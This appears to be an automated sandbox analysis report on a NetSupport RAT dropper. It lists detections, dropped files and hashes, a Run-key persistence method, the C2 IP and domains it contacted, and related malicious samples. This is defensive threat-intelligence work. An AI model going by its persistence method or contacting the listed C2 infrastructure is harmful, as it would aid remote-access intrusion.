                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		5
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder                                		13
                                Process Injection                                		1
                                Masquerading                                		LSA Secrets251
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Modify Registry                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580475 Sample: d1c701d984c5e04b42f3cb7165f... Startdate: 24/12/2024 Architecture: WINDOWS Score: 96 38 geo.netsupportsoftware.com 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 4 other signatures 2->52 8 d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe 17 2->8         started        11 bild.exe 2->11         started        13 bild.exe 2->13         started        15 bild.exe 2->15         started        signatures3 process4 file5 30 C:\Users\Public30etstat\remcmdstub.exe, PE32 8->30 dropped 32 C:\Users\Public32etstat\pcicapi.dll, PE32 8->32 dropped 34 C:\Users\Public34etstat\bild.exe, PE32 8->34 dropped 36 6 other files (3 malicious) 8->36 dropped 17 cmd.exe 1 8->17         started        process6 signatures7 44 Uses cmd line tools excessively to alter registry or file data 17->44 20 bild.exe 16 17->20         started        24 conhost.exe 17->24         started        26 reg.exe 1 1 17->26         started        28 reg.exe 1 1 17->28         started        process8 dnsIp9 40 45.76.253.210, 443, 49730 AS-CHOOPAUS United States 20->40 42 geo.netsupportsoftware.com 104.26.1.231, 49731, 49732, 49733 CLOUDFLARENETUS United States 20->42 54 Multi AV Scanner detection for dropped file 20->54 56 Contains functionalty to change the wallpaper 20->56 58 Delayed program exit found 20->58 60 Contains functionality to detect sleep reduction / modifications 20->60 signatures10

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe58%ReversingLabsWin32.Trojan.NetSupport

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Netstat\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Netstat\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\bild.exe29%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\Public\Netstat\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Netstat\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Netstat\remcmdstub.exe13%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.pci.co.uk/support0%Avira URL Cloudsafe
                                http://45.76.253.210/fakeurl.htm0%Avira URL Cloudsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                http://www.pci.co.uk/supportsupport0%Avira URL Cloudsafe
                                http://127.0.0.1RESUMEPRINTING0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.1.231
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://45.76.253.210/fakeurl.htmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.pci.co.uk/supportd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://%s/testpage.htmwininet.dllbild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://geo.netsupportsoftware.com/location/loca.aspcbild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                        		high
                                        http://www.pci.co.uk/supportsupportd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.symauth.com/rpa00d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                          		high
                                          http://geo.netsupportsoftware.com/location/loca.asp7bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://geo.netsupportsoftware.com/location/loca.asp;bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://geo.netsupportsoftware.com/location/loca.asp2.bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://127.0.0.1RESUMEPRINTINGd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://%s/testpage.htmbild.exe, bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://geo.netsupportsoftware.com/location/loca.aspUbild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.netsupportschool.com/tutor-assistant.asp11(d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                    		high
                                                    http://geo.netsupportsoftware.com/location/loca.aspLMEMHbild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://127.0.0.1bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                        		high
                                                        http://geo.netsupportsoftware.com/location/loca.asptbild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://geo.netsupportsoftware.com/location/loca.aspibild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.symauth.com/cps0(d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.00000000054F9000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                              		high
                                                              http://geo.netsupportsoftware.com/location/loca.aspGbild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.netsupportschool.com/tutor-assistant.aspd1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://%s/fakeurl.htmbild.exe, bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://geo.netsupportsoftware.com/location/loca.aspMbild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  45.76.253.210
                                                                  		unknownUnited States
                                                                  		20473AS-CHOOPAUStrue
                                                                  104.26.1.231
                                                                  		geo.netsupportsoftware.comUnited States
                                                                  		13335CLOUDFLARENETUSfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1580475
                                                                  Start date and time:2024-12-24 17:36:06 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 48s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:13
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                  Detection:MAL
                                                                  Classification:mal96.rans.evad.winEXE@14/12@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 81%
                                                                  • Number of executed functions: 210
                                                                  • Number of non-executed functions: 154
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  11:37:33API Interceptor18129566x Sleep call for process: bild.exe modified
                                                                  16:37:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
                                                                  16:37:12AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe
                                                                  16:37:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\bild.exe

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.26.1.231Merge.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  geo.netsupportsoftware.comfile.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                  • 104.26.0.231
                                                                  5j0fix05fy.jsGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.0.231
                                                                  Merge.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231
                                                                  lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.0.231
                                                                  Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                  • 104.26.0.231
                                                                  5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231
                                                                  Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.0.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  AS-CHOOPAUSarmv5l.elfGet hashmaliciousMiraiBrowse
                                                                  • 66.42.103.144
                                                                  jklm68k.elfGet hashmaliciousUnknownBrowse
                                                                  • 44.40.163.25
                                                                  nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                  • 44.172.196.44
                                                                  nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                  • 217.163.30.244
                                                                  nklx86.elfGet hashmaliciousUnknownBrowse
                                                                  • 45.76.237.246
                                                                  nklppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 173.199.121.211
                                                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                                                  • 44.168.169.170
                                                                  arm7.elfGet hashmaliciousMiraiBrowse
                                                                  • 44.168.169.177
                                                                  nsharm5.elfGet hashmaliciousMiraiBrowse
                                                                  • 45.32.145.147
                                                                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                  • 45.77.195.36
                                                                  CLOUDFLARENETUSdatasett.exeGet hashmaliciousUnknownBrowse
                                                                  • 104.26.3.46
                                                                  https://tb.ldpdljrr.ru/Get hashmaliciousUnknownBrowse
                                                                  • 104.21.30.230
                                                                  installer.msiGet hashmaliciousUnknownBrowse
                                                                  • 172.67.196.179
                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.88.181
                                                                  badvbscript.htmlGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                  • 172.67.201.143
                                                                  https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                  • 104.17.25.14
                                                                  vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.33.227
                                                                  iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 172.67.199.72
                                                                  j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                  • 104.21.36.201

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\Public\Netstat\HTCTL32.DLLhttps://tekascend.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                      file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                                        lFxGd66yDa.exeGet hashmaliciousNetSupport RATBrowse
                                                                          Jjv9ha2GKn.exeGet hashmaliciousNetSupport RAT, DarkTortillaBrowse
                                                                            5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
                                                                              file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                  file.exeGet hashmaliciousNetSupport RATBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\Public\Netstat\HTCTL32.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):328056
                                                                                    Entropy (8bit):6.754723001562745
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                    MD5:2D3B207C8A48148296156E5725426C7F
                                                                                    SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                    SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                    SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: , Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: lFxGd66yDa.exe, Detection: malicious, Browse
                                                                                    • Filename: Jjv9ha2GKn.exe, Detection: malicious, Browse
                                                                                    • Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Netstat\NSM.LIC

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):257
                                                                                    Entropy (8bit):5.119720931145611
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                    MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                    SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                    SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                    SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                    Malicious:false
                                                                                    Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

                                                                                    C:\Users\Public\Netstat\PCICHEK.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):18808
                                                                                    Entropy (8bit):6.22028391196942
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                    MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                    SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                    SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                    SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                    Malicious:false
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\Public\Netstat\PCICL32.DLL

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
